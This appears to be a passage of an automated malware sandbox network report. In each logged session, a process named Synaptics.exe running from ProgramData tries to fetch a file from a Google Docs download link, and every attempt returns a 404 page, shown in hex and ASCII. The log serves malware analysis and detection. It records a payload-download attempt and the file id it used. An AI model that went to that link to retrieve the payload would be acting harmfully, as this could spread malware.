                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:21 UTC42INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 7a 66 45 58 57 41 70 55 61 49 79 32 6f 6e 6b 4b 51 6f 4c 54 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BzfEXWApUaIy2onkKQoLTQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:21 UTC44INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:21 UTC44INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  14192.168.2.349756172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:21 UTC40OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:21 UTC44INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:21 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-HRWE88d19AAGun80LpdvkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:21 UTC45INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:21 UTC45INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 36 75 51 56 5f 44 46 75 54 7a 36 39 76 6e 4b 50 4f 4b 6f 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="V6uQV_DFuTz69vnKPOKoRg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:21 UTC46INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:21 UTC47INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  15192.168.2.349759172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:21 UTC44OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:22 UTC47INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Mcne5Xx0myz3cvt4Cyy1nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:22 UTC48INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 4b 44 34 38 37 30 38 48 55 6a 66 63 32 78 41 62 73 6f 55 39 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XKD48708HUjfc2xAbsoU9A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:22 UTC50INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:22 UTC50INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  16192.168.2.349760172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:21 UTC47OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:22 UTC50INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-t-xEVNIuAmkzXMY8aP5EfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:22 UTC51INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 4d 77 36 39 6c 63 51 66 74 5a 42 45 67 6a 52 71 77 4d 76 30 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cMw69lcQftZBEgjRqwMv0Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                  2022-05-27 02:38:22 UTC53INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                  Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                  2022-05-27 02:38:22 UTC53INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  17192.168.2.349761172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:22 UTC50OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:22 UTC53INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-Zrg8_pabdy69ezfd0byLvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:22 UTC54INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                  2022-05-27 02:38:22 UTC54INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 73 41 32 61 72 78 63 6b 37 75 32 55 35 71 68 41 72 34 45 2d 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                  Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dsA2arxck7u2U5qhAr4E-w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                  2022-05-27 02:38:22 UTC56INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                  Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                  2022-05-27 02:38:22 UTC56INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                  18192.168.2.349762172.217.168.14443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                  2022-05-27 02:38:22 UTC56OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                  User-Agent: Synaptics.exe
                                                                                                                                                                                  Host: docs.google.com
                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                  2022-05-27 02:38:22 UTC56INHTTP/1.1 404 Not Found
                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                  Date: Fri, 27 May 2022 02:38:22 GMT
                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-RVtF3aLbLRDvajVCurLGVA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  2022-05-27 02:38:22 UTC57INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                  Data Ascii: 66a<html lang=en><meta ch
